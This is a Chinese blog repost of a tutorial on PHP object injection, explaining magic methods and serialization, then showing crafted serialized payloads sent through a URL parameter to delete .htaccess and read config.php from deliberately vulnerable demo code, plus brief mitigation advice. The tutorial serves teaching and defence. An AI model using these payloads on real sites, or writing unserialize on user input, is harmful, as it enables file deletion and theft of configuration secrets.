1個月前 (09-09) 中國互聯安全響應中心  PHP
文章評分 1 次,平均分 4.0

0x00 背景


原文:http://securitycafe.ro/2015/01/05/understanding-php-object-injection/

php對象注入是一個非常常見的漏洞,這個類型的漏洞雖然有些難以利用,但仍舊非常危險,為了理解這個漏洞,請讀者具備基礎的php知識。

0x01 漏洞案例


如果你覺得這是個渣渣洞,那么請看一眼這個列表,一些被審計狗挖到過該漏洞的系統,你可以發現都是一些耳熟能詳的玩意(就國外來說)

WordPress 3.6.1

Magento 1.9.0.1

Joomla 3.0.3

Ip board 3.3.5

除此之外等等一堆系統,八成可能大概在這些還有其他的php程序中還有很多這種類型的漏洞,所以不妨考慮坐下喝杯咖啡并且試著去理解這篇文章。

0x01 PHP類和對象


類和變量是非常容易理解的php概念,打個比方,下面的代碼在一個類中定義了一個變量和一個方法。

#!php
<?php
class TestClass
{
    // 一個變量
    public $variable = 'This is a string';

    // 一個簡單的方法
    public function PrintVariable()
    {
        echo $this->variable;
    }
}

// 創建一個對象
$object = new TestClass();

// 調用一個方法
$object->PrintVariable();
?>

它創建了一個對象并且調用了 PrintVariable 函數,該函數會輸出變量 variable。

如果想了解更多關于php面向對象編程的知識 請點: http://php.net/manual/zh/language.oop5.php

0x02 php magic方法


php類可能會包含一些特殊的函數叫magic函數,magic函數命名是以符號“__”開頭的,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。

這些函數在某些情況下會自動調用,比如:

__construct 當一個對象創建時調用 (constructor) __destruct 當一個對象被銷毀時調用 (destructor) __ toString當一個對象被當作一個字符串使用

為了更好的理解magic方法是如何工作的,讓我們添加一個magic方法在我們的類中。

#!php
<?php
class TestClass
{
    // 一個變量
    public $variable = 'This is a string';

    // 一個簡單的方法
    public function PrintVariable()
    {
        echo $this->variable . '<br />';
    }

    // Constructor
    public function __construct()
    {
        echo '__construct <br />';
    }

    // Destructor
    public function __destruct()
    {
        echo '__destruct <br />';
    }

    // Call
    public function __toString()
    {
        return '__toString<br />';
    }
}

// 創建一個對象
//  __construct會被調用

$object = new TestClass();

// 創建一個方法
//  'This is a string’ 這玩意會被輸出

$object->PrintVariable();
// 對象被當作一個字符串
//  __toString 會被調用

echo $object;

// End of PHP script
// php腳本要結束了, __destruct會被調用

?>

我們往里頭放了三個 magic方法,__construct, __destruct和 __toString,你可以看出來,__construct在對象創建時調用, __destruct在php腳本結束時調用,__toString在對象被當作一個字符串使用時調用。

這個腳本會輸出這狗樣:

__construct 
This is a string 
__toString 
__destruct

這只是一個簡單的例子,如果你想了解更多有關magic函數的例子,請點擊下面的鏈接:

http://php.net/manual/zh/language.oop5.magic.php

0x03 php對象序列化


php允許保存一個對象方便以后重用,這個過程被稱為序列化,打個比方,你可以保存一個包含著用戶信息的對象方便等等重用。

為了序列化一個對象,你需要調用 “serialize”函數,函數會返回一個字符串,當你需要用到這個對象的時候可以使用“unserialize”去重建對象。

讓我們在序列化丟進那個例子,看看序列化張什么樣。

</pre>
<pre>
#!php
<?php
// 某類
class User
{
    // 類數據
    public $age = 0;
    public $name = '';

    // 輸出數據
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age
             . ' years old. <br />';
    }
}

// 創建一個對象
$usr = new User();

// 設置數據
$usr->age = 20;
$usr->name = 'John';
// 輸出數據
$usr->PrintData();
// 輸出序列化之后的數據
echo serialize($usr);
?>

它會輸出

User John is 20 years old. 
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

你可以看到序列化之后的數據中 有 20和John,其中沒有任何跟類有關的東西,只有其中的數據被數據化。

為了使用這個對象,我們用unserialize重建對象。

#!php
<?php
// 某類
class User
{
    // Class data
    public $age = 0;
    public $name = '';

    // Print data
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 重建對象
$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');

// 調用PrintData 輸出數據
$usr->PrintData();
?>

著會輸出

User John is 20 years old

0x04 序列化magic函數


magic函數constructor (__construct)和 destructor (__destruct) 是會在對象創建或者銷毀時自動調用,其他的一些magic函數會在serialize 或者 unserialize的時候被調用。

__sleep magic方法在一個對象被序列化的時候調用。 __wakeup magic方法在一個對象被反序列化的時候調用。

注意 __sleep 必須返回一個數組與序列化的變量名。

#!php
<?php
class Test
{
    public $variable = 'BUZZ';
    public $variable2 = 'OTHER';

    public function PrintVariable()
    {
        echo $this->variable . '<br />';
    }

    public function __construct()
    {
        echo '__construct<br />';
    }

    public function __destruct()
    {
        echo '__destruct<br />';
    }

    public function __wakeup()
    {
        echo '__wakeup<br />';
    }

    public function __sleep()
    {
        echo '__sleep<br />';
        return array('variable', 'variable2');
    }
}

// 創建一個對象,會調用 __construct
$obj = new Test();

// 序列化一個對象,會調用 __sleep
$serialized = serialize($obj);

//輸出序列化后的字符串
print 'Serialized: ' . $serialized . <br />';
// 重建對象,會調用 __wakeup
$obj2 = unserialize($serialized);

//調用 PintVariable, 會輸出數據 (BUZZ)
$obj2->PrintVariable();
// php腳本結束,會調用 __destruct 
?>

這玩意會輸出:

__construct 
__sleep 
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";} 
__wakeup 
BUZZ 
__destruct 
__destruct

你可以看到,我們創建了一個對象,序列化了它(然后__sleep被調用),之后用序列化對象重建后的對象創建了另一個對象,接著php腳本結束的時候兩個對象的__destruct都會被調用。

更多相關的內容

http://php.net/manual/zh/language.oop5.serialization.php

0x05 php對象注入


現在我們理解了序列化是如何工作的,我們該如何利用它?事實上,利用這玩意的可能性有很多種,關鍵取決于應用程序的流程與,可用的類,與magic函數。

記住序列化對象的值是可控的。

你可能會找到一套web程序的源代碼,其中某個類的__wakeup 或者 __destruct and其他亂七八糟的函數會影響到web程序。

打個比方,我們可能會找到一個類用于臨時將日志儲存進某個文件,當__destruct被調用時,日志文件會被刪除。然后代碼張這狗樣。

#!php
<?php 

class LogFile
{
    // log文件名
    public $filename = 'error.log';

    // 某代碼,儲存日志進文件
    public function LogData($text)
    {
        echo 'Log some data: ' . $text . '<br />';
        file_put_contents($this->filename, $text, FILE_APPEND);
    }

    // Destructor 刪除日志文件
    public function __destruct()
    {
        echo '__destruct deletes "' . $this->filename . '" file. <br />';
        unlink(dirname(__FILE__) . '/' . $this->filename);
    }
}
?>

某例子關于如何使用這個類

#!php
<?php
include 'logfile.php';

// 創建一個對象
$obj = new LogFile();

// 設置文件名和要儲存的日志數據
$obj->filename = 'somefile.log';
$obj->LogData('Test');

// php腳本結束啦,__destruct被調用,somefile.log文件被刪除。

?>

在其他的腳本,我們可能又恰好找到一個調用“unserialize”函數的,并且恰好變量是用戶可控的,又恰好是$_GET之類的什么玩意的。

#!php
<?php
include 'logfile.php';

// ... 一些狗日的代碼和 LogFile 類 ...
// 簡單的類定義
class User
{
    // 類數據
    public $age = 0;
    public $name = '';

    // 輸出數據
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 重建 用戶輸入的 數據
$usr = unserialize($_GET['usr_serialized']);
?>

你看,這個代碼調用了 “LogClass” 類,并且有一個 “unserialize” 值是我們可以注入的。

所以構造類似這樣的東西:

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

究竟發生了什么呢,因為輸入是可控的,所以我們可以構造任意的序列化對象,比如:

#!php
<?php
$obj = new LogFile();
$obj->filename = '.htaccess';
echo serialize($obj) . '<br />';
?>

這個會輸出

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} 
__destruct deletes ".htaccess" file.

現在我們將構造過后的序列化對象發送給剛才的腳本:

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}

這會輸出

__destruct deletes ".htaccess" file.

現在 .htaccess 已經被干掉了,因為腳本結束時 __destruct會被調用。不過我們已經可以控制“LogFile”類的變量啦。

這就是漏洞名稱的由來:變量可控并且進行了unserialize操作的地方注入序列化對象,實現代碼執行或者其他坑爹的行為。

雖然這不是一個很好的例子,不過我相信你可以理解這個概念,unserialize自動調用 __wakeup 和 __destruct,接著攻擊者可以控制類變量,并且攻擊web程序。

0x06 常見的注入點


先不談 __wakeup 和 __destruct,還有一些很常見的注入點允許你利用這個類型的漏洞,一切都是取決于程序邏輯。

打個比方,某用戶類定義了一個__toString為了讓應用程序能夠將類作為一個字符串輸出(echo $obj) ,而且其他類也可能定義了一個類允許__toString讀取某個文件。

#!php
<?php 
// … 一些include ...
class FileClass
{
    // 文件名
    public $filename = 'error.log';

    //當對象被作為一個字符串會讀取這個文件
    public function __toString()
    {
        return file_get_contents($this->filename);
    }
}

// Main User class
class User
{
    // Class data
    public $age = 0;
    public $name = '';

    // 允許對象作為一個字符串輸出上面的data
    public function __toString()
    {
        return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 用戶可控
$obj = unserialize($_GET['usr_serialized']);

// 輸出 __toString
echo $obj;

?>

so,我們構造url

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

再想想,如果我們用序列化調用 FileClass呢

我們創建利用代碼

#!php
<?php
$fileobj = new FileClass();
$fileobj->filename = 'config.php';
echo serialize($fileobj);

?>

接著用生成的exp注入url

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}

接著網頁會輸出 config.php的源代碼

#!php
<?php
     $private_data = 'MAGIC';
?>

ps:我希望這讓你能夠理解。

0x07 其他的利用方法


可能其他的一些magic函數海存在利用點:比如__call 會在對象調用不存在的函數時調用,__get 和 __set會在對象嘗試訪問一些不存在的類,變量等等時調用。

不過需要注意的是,利用場景不限于magic函數,也有一些方式可以在一半的函數中利用這個漏洞,打個比方,一個模塊可能定義了一個叫get的函數進行一些敏感的操作,比如訪問數據庫,這就可能造成sql注入,取決于函數本身的操作。

唯一的一個技術難點在于,注入的類必須在注入點所在的地方,不過一些模塊或者腳本會使用“autoload”的功能,具體可以在這里了解

http://php.net/manual/zh/language.oop5.autoload.php

ps:去讀那狗屎的代碼

0x08 如何利用或者避免這個漏洞


別在任何用戶可控的地方使用“unserialize”,可以考慮“json_decode“

0x09 結論


雖然很難找到而且很難利用,但是這真的真的很嚴重,可以導致各種各樣的漏洞。


//下面這個css和插件后臺設置的主題有關系,如果需要換樣式,則需要修改以下CSS名稱

  
 

除特別注明外,本站所有文章均為鐵匠運維網原創,轉載請注明出處來自http://www.kzrhud.live/24932.html

中國互聯是江蘇邦寧科技有限公司旗下的著名IT服務供應商品牌之一,是國內IDC行業十大之一、企業互聯網服務首選品牌。江蘇邦寧科技成立于2003年,是國內互聯網名稱與數字地址服務、云數據中心機房服務的引領者,是行業云計算解決方案、網站智能建設、企業智能辦公軟件、移動互聯網開發的創新者。自成立以來,公司秉承“一切為了客戶滿意”的核心理念,堅持“國際化、專業化、高端化”的發展思路,堅持“以客戶需求為導向、以技術創新為基礎、以服務創新為支撐”,先后為國內各級政府、社會服務機構、國內外眾多500強企業及中小企業、個人客戶提供了專業、高質、優越的互聯網應用服務。

發表評論

暫無評論

切換注冊

登錄

忘記密碼 ?

您也可以使用第三方帳號快捷登錄

切換登錄

注冊

掃一掃二維碼分享
青海11选5开奖结果走势图